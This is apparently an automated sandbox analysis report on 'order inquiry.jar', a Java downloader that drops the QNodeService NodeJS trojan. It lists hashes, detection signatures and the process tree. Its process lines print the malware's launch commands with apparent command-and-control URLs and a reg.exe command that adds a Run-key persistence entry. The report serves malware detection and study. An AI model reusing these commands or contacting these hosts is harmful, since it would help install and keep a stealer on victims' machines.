Analysis
-
max time kernel
127s -
max time network
142s -
platform
windows10_x64 -
resource
win10 -
submitted
02-07-2020 06:59
Static task
static1
Behavioral task
behavioral1
Sample
order inquiry.jar
Resource
win7
Behavioral task
behavioral2
Sample
order inquiry.jar
Resource
win10
General
-
Target
order inquiry.jar
-
Size
13KB
-
MD5
c1dae1cfd76817255cb7836927d6c85b
-
SHA1
2b9d4d3f6d0d599cff72f721f845278a2b791d27
-
SHA256
82785f7db62e9cabf47231d0fe34699459c74ec9d1386f09f97254465c4ce1cd
-
SHA512
6c0cb3476d25c497f9cae09a5fb27014ebabd8a860203b8867cf027fea466212e4af0d5c9058d9cb16cbd05c6b78b092f15982de40673c997871ce5b6aee3d84
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 60 node.exe 1604 node.exe -
Loads dropped DLL 4 IoCs
pid Process 1604 node.exe 1604 node.exe 1604 node.exe 1604 node.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1604 node.exe 1604 node.exe -
QNodeService NodeJS Trojan 1 IoCs
resource yara_rule behavioral2/files/0x000100000001bff2-117.dat family_qnodeservice -
QNodeService
is a trojan written in NodeJS and spread via Java downloader. Utilizes stealer functionality.
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 3888 wrote to memory of 60 3888 java.exe 68 PID 3888 wrote to memory of 60 3888 java.exe 68 PID 60 wrote to memory of 1400 60 node.exe 69 PID 60 wrote to memory of 1400 60 node.exe 69 PID 1400 wrote to memory of 1480 1400 cmd.exe 70 PID 1400 wrote to memory of 1480 1400 cmd.exe 70 PID 60 wrote to memory of 1604 60 node.exe 71 PID 60 wrote to memory of 1604 60 node.exe 71 -
Adds Run entry to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\qnodejs-f925e117 = "cmd /D /C \"C:\\Users\\Admin\\qnodejs-node-v13.13.0-win-x64\\qnodejs\\qnodejs-f925e117.cmd\"" reg.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 7 wtfismyip.com 8 wtfismyip.com
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\order inquiry.jar"1⤵
- Suspicious use of WriteProcessMemory
PID:3888 -
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\wizard.js start --group user:[email protected] --register-startup --central-base-url https://minecroft.duckdns.org --central-base-url https://minekroft.duckdns.org --central-base-url https://minecroft.hopto.org2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:60 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-f925e117" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-f925e117.cmd\"""3⤵
- Suspicious use of WriteProcessMemory
PID:1400 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-f925e117" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-f925e117.cmd\""4⤵
- Adds Run entry to start application
PID:1480
-
-
-
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-win32-x64.js serve start --group user:[email protected] --register-startup --central-base-url https://minecroft.duckdns.org --central-base-url https://minekroft.duckdns.org --central-base-url https://minecroft.hopto.org3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Checks processor information in registry
PID:1604
-
-